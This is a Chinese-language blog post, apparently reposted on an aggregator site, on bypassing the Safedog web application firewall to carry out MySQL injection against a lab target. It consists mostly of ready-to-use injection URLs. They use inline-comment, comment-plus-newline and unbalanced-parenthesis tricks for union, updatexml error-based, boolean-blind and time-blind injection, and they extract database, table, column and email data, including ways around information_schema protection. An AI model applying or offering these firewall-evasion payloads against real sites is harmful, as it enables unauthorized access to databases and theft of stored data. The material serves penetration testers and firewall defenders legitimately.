mysql bypass_Bypass MySQL Safedog
跟團隊小伙伴一起日狗
判斷注入
安全狗不讓基本運算符后跟數字字符串
特殊運算符繞
16進制繞
BINARY繞
conv()函數繞
concat()函數繞
判斷字段數
繞order by
內聯
注釋換行
聯合查詢
關鍵在于打亂union select
內聯
http://172.16.1.157/sql/Less-1/?id=-1' /*!14440union*//*!14440select */1,2,3 -- +
注釋后跟垃圾字符換行
union distinct | distinctrow | all
接下來是查數據,我在這使用注釋垃圾字符換行也就是%23a%0a的方法來繞,你可以用上面說的/*!14440*/內聯
查當前數據庫名
http://172.16.1.157/sql/Less-1/?id=-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +
查其他庫名 安全狗4.0默認沒開information_schema防護的時候可以過,開了information_schema防護之后繞不過去,哭唧唧😭
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select schema_name from %23%0ainformation_schema.schemata limit 1,1),3 -- +
查表名
http://172.16.1.157/sql/Less-1/?id=-1' union %23asdasdasd%0a select 1,(select table_name from %23%0ainformation_schema.tables where table_schema=database(%23%0a) limit 1,1),3 -- +
查列名,首先是沒開information_schema防護時
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a select 1,(select column_name from %23%0a information_schema.columns where table_name=0x7573657273 and%23a%0a table_schema=database(%23%0a) limit 1,1),3 -- +
開information_schema防護有兩種姿勢,不過需要知道表名
一、子查詢
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0a SELECT 1,2,x.2 from %23a%0a(SELECT * from %23a%0a (SELECT 1)a, (SELECT 2)b union %23a%0aSELECT *from %23a%0aemails)x limit 2,1 -- +
二、用join和using爆列名,前提是頁面可以報錯,需要已知表名
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b) c) -- +
然后通過using來繼續爆
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select * from %23a%0a(select * from %23a%0aemails a join emails b using(id)) c) -- +
查數據
http://172.16.1.157/sql/Less-1/?id=-1' union %23a%0aSELECT 1,2,(select email_id from%23a%0a emails limit 1,1) -- +
其實配合MySQL5.7的特性可以使用sys這個庫來繞過,具體看chabug發的文章吧 注入bypass之捶狗開鎖破盾
在下文中不再提及開啟information_schema防護的繞過姿勢,自行舉一反三。
報錯注入
報錯注入只提及updatexml報錯
關鍵在于updatexml()結構打亂
and updatexml(1,1,1 不攔截
and updatexml(1,1,1) 攔截
不讓updatexml匹配到兩個括號就行了
用戶名 庫名
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,user(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,database(/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
庫名
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select schema_name from %23a%0a information_schema.schemata limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
表名
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select table_name from %23a%0a information_schema.tables where table_schema=database(/*!)*/ limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
列名
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,`concat`(0x7e,(select column_name from %23a%0a information_schema.columns where table_schema=database(/*!)*/ and %23a%0atable_name=0x7573657273 limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
查數據
http://172.16.1.157/sql/Less-1/?id=-1' and updatexml(1,concat(0x7e,(select email_id from %23a%0a emails limit 1,1/*!)*/,0x7e/*!)*/,1/*!)*/ -- +
盲注
分布爾盲注和時間盲注來說吧
布爾盲注
不讓他匹配完整括號對
使用left()或者right()
http://172.16.1.157/sql/Less-1/?id=1' and hex(LEFT(user(/*!)*/,1))=%23a%0a72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(right(user(/*!)*/,1))=%23a%0a72 -- +
使用substring() substr()
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTRING(user(/*!)*/,1,1))=72 -- +
http://172.16.1.157/sql/Less-1/?id=1' and hex(substr(user(/*!)*/,1,1))=72 -- +
查表名
http://172.16.1.157/sql/Less-1/?id=1' and hex(SUBSTR((select table_name from %23a%0a information_schema.tables where table_schema=%23a%0adatabase%23a%0a(/*!)*/ limit 0,1),1,1))=65-- +
列名字段名同理,略
時間盲注
不匹配成對括號
sleep()繞過
查用戶
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=char(114),sleep(3/*!)*/,1/*!)*/ -- +
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left(user(/*!)*/,1/*!)*/=0x72,sleep(3/*!)*/,1/*!)*/ -- +
查數據 limit過不了
http://172.16.1.157/sql/Less-1/?id=1' and if%23%0a(left((select group_concat(table_name/*!)*/ from%23a%0ainformation_schema.tables where table_schema=database(/*!)*/ /*!)*/,1/*!)*/=0x65,sleep(5/*!)*/,1/*!)*/ -- +
其他
length()長度
count()
http://172.16.1.157/sql/Less-1/?id=1' and (%23a%0aselect count(password/*!)*/ from %23a%0a users/*!)*/<=>13 -- +
參考
文筆垃圾,措辭輕浮,內容淺顯,操作生疏。不足之處歡迎大師傅們指點和糾正,感激不盡。
總結
以上是生活随笔為你收集整理的mysql bypass_Bypass MySQL Safedog的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: mysql using filesort
- 下一篇: mysql.info文件是什么_info